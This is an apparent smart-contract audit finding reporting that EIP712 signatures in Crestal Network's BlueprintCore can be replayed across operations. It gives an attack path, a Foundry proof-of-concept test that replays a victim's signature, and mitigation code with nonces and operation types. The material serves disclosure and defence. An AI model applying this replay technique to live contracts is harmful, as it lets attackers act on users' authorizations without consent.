Wonderful Lava Fox

High

# Attackers will steal user authorizations by replaying signatures across different operations

### Summary

The lack of signature replay protection in EIP712 implementation will cause a high-severity vulnerability for users as attackers will replay signatures intended for one operation to execute different operations.

### Root Cause

In `src/EIP712.sol` and `src/BlueprintCore.sol`, the signature verification process lacks protection against replay attacks. Specifically:

- In [EIP712.sol#L33-L51](https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/EIP712.sol#L33-L51) the digest generation functions don’t include nonces or operation types
- In [BlueprintCore.sol#L265-L281](https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintCore.sol#L265-L281) and [BlueprintCore.sol#L400-L414](https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintCore.sol#L400-L414) the signature verification only checks if the signer is valid, not if the signature was intended for the specific operation

### Internal Pre-conditions

1. A user needs to sign a message for one operation (e.g., creating a proposal request)
2. The signature needs to be submitted on-chain for the intended operation
3. The contract needs to successfully process the signature-based operation

### External Pre-conditions

No external pre-conditions are required for this vulnerability !

### Attack Path

1. Alice signs a message to create a proposal request for her project using her private key
2. Alice submits the transaction with her signature to create the proposal request
3. The attacker observes Alice’s signature on the blockchain
4. The attacker creates a new transaction using Alice’s signature but for a different operation (e.g., deployment request)
5. The contract verifies the signature is valid (from Alice) but doesn’t check if it was intended for this specific operation
6. The contract processes the attacker’s request as if Alice had authorized it

### Impact

Users suffer unauthorized operations performed on their behalf. The attacker can create deployment requests, proposal requests, or other operations using the victim’s authorization, potentially leading to financial losses, unauthorized deployments, or manipulation of project ownership.

### PoC

```solidity

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.26;

import "forge-std/Test.sol";
import "../src/BlueprintCore.sol";
import "../src/BlueprintV5.sol";
import "../src/EIP712.sol";
import "@openzeppelin/contracts/proxy/ERC1967/ERC1967Proxy.sol";
import "@openzeppelin/contracts/utils/cryptography/ECDSA.sol";

contract POC_BlueprintCore_EIP712SignatureReplay is Test {
    BlueprintV5 public blueprint;
    
    address public alice; // Victim
    address public attacker;
    address public protocol; // Protocol admin
    
    bytes32 public aliceProjectId = keccak256("Alice Project");
    bytes32 public attackerProjectId = keccak256("Attacker Project");
    string public base64Param = "base64EncodedParameters";
    string public serverURL = "app.crestal.network";
    
    uint256 private alicePrivateKey;
    
    function setUp() public {
        // Generate user addresses with known private keys
        alicePrivateKey = 0x12345;
        alice = vm.addr(alicePrivateKey);
        attacker = makeAddr("attacker");
        protocol = makeAddr("protocol");
        
        // Deploy BlueprintV5 implementation
        BlueprintV5 implementation = new BlueprintV5();
        
        // Deploy proxy with the implementation
        ERC1967Proxy proxy = new ERC1967Proxy(
            address(implementation),
            abi.encodeWithSelector(
                BlueprintV5.initialize.selector
            )
        );
        
        // Get the proxied BlueprintV5 (which inherits from BlueprintCore)
        blueprint = BlueprintV5(payable(address(proxy)));
        
        // Setup accounts
        vm.deal(alice, 10 ether);
        vm.deal(attacker, 10 ether);
        vm.deal(protocol, 10 ether);
    }
    
    function testSignatureReplayAttack() public {
        // SCENARIO: Alice signs a message to create a proposal for her project
        // The attacker intercepts this signature and uses it to create a deployment request
        // for a completely different project, effectively stealing Alice's authorization
        
        // Step 1: Alice creates a proposal request with signature
        vm.startPrank(alice);
        
        // Alice gets the digest for her proposal request
        bytes32 proposalDigest = blueprint.getRequestProposalDigest(aliceProjectId, base64Param, serverURL);
        
        // Alice signs the digest with her private key
        (uint8 v, bytes32 r, bytes32 s) = vm.sign(alicePrivateKey, proposalDigest);
        bytes memory aliceSignature = abi.encodePacked(r, s, v);
        
        // Alice creates her project ID and proposal request with signature
        bytes32 proposalRequestID = blueprint.createProjectIDAndProposalRequestWithSig(
            aliceProjectId, 
            base64Param, 
            serverURL, 
            aliceSignature
        );
        
        console.log("Alice created project and proposal with request ID:", vm.toString(proposalRequestID));
        
        // Verify Alice is associated with her project
        bytes32 aliceProject = blueprint.latestProjectID(alice);
        assertEq(aliceProject, aliceProjectId, "The project should be associated with Alice");
        
        vm.stopPrank();
        
        // Step 2: Attacker observes Alice's signature on-chain and decides to exploit it
        vm.startPrank(attacker);
        
        // Attacker tries to use Alice's signature for a completely different operation
        // - Different project ID
        // - Different operation (deployment instead of proposal)
        
        console.log("\n=== ATTACK SCENARIO ===");
        console.log("Attacker observed Alice's signature and is now attempting to replay it");
        
        // The attacker tries to use Alice's signature for their own project
        try blueprint.createProjectIDAndDeploymentRequestWithSig(
            attackerProjectId,
            base64Param,
            serverURL,
            aliceSignature  // Replay Alice's signature
        ) returns (bytes32 deploymentRequestID) {
            console.log("ATTACK SUCCEEDED! Deployment request ID:", vm.toString(deploymentRequestID));
            
            // The attack succeeds if the signature can be used for a different project
            emit log_string("VULNERABILITY CONFIRMED: EIP712 signature can be replayed for different projects and operations!");
            
            // Check if the deployment request is associated with Alice (the original signer)
            bytes32 latestDeploymentRequestId = blueprint.getLatestDeploymentRequestID(alice);
            if (latestDeploymentRequestId == deploymentRequestID) {
                console.log("The deployment request is associated with Alice instead of the attacker!");
                console.log("This means the attacker has effectively stolen Alice's authorization.");
            }
        } catch Error(string memory reason) {
            console.log("Attack reverted with reason:", reason);
            fail();
        } catch {
            console.log("Attack reverted without specific reason");
            fail();
        }
        
        vm.stopPrank();
    }
}

```

### Mitigation

To fix this vulnerability, implement one or more of these countermeasures:

1. **Nonce-based protection**: Track a nonce for each user address and increment it after each signature use.

```solidity
// Add nonce tracking
mapping(address => uint256) private _nonces;

// Add nonce to the signed message type hash
bytes32 public constant PROPOSAL_REQUEST_TYPEHASH =
    keccak256("ProposalRequest(bytes32 projectId,string base64RecParam,string serverURL,uint256 nonce)");

function getRequestProposalDigest(
    bytes32 projectId, 
    string memory base64RecParam, 
    string memory serverURL
) public view returns (bytes32) {
    bytes32 structHash = keccak256(
        abi.encode(
            PROPOSAL_REQUEST_TYPEHASH, 
            projectId, 
            keccak256(bytes(base64RecParam)), 
            keccak256(bytes(serverURL)),
            _nonces[msg.sender]
        )
    );
    return _hashTypedDataV4(structHash);
}

// Use and increment nonce in functions accepting signatures
function createProjectIDAndProposalRequestWithSig(...) public {
    // get signer address
    address signerAddr = getSignerAddress(digest, signature);
    
    // Increment nonce after use
    _nonces[signerAddr]++;
    
    // Rest of the function...
}
```

2. **Operation-specific signatures**: Include the operation type in the signed message to ensure that signatures can only be used for the intended operation.

```solidity
// Add operation type to the signed message type hash
bytes32 public constant PROPOSAL_REQUEST_TYPEHASH =
    keccak256("ProposalRequest(bytes32 projectId,string base64RecParam,string serverURL,string operation)");

function getRequestProposalDigest(
    bytes32 projectId, 
    string memory base64RecParam, 
    string memory serverURL
) public view returns (bytes32) {
    bytes32 structHash = keccak256(
        abi.encode(
            PROPOSAL_REQUEST_TYPEHASH, 
            projectId, 
            keccak256(bytes(base64RecParam)), 
            keccak256(bytes(serverURL)),
            keccak256(bytes("createProposalRequest"))  // Operation type
        )
    );
    return _hashTypedDataV4(structHash);
}
``` 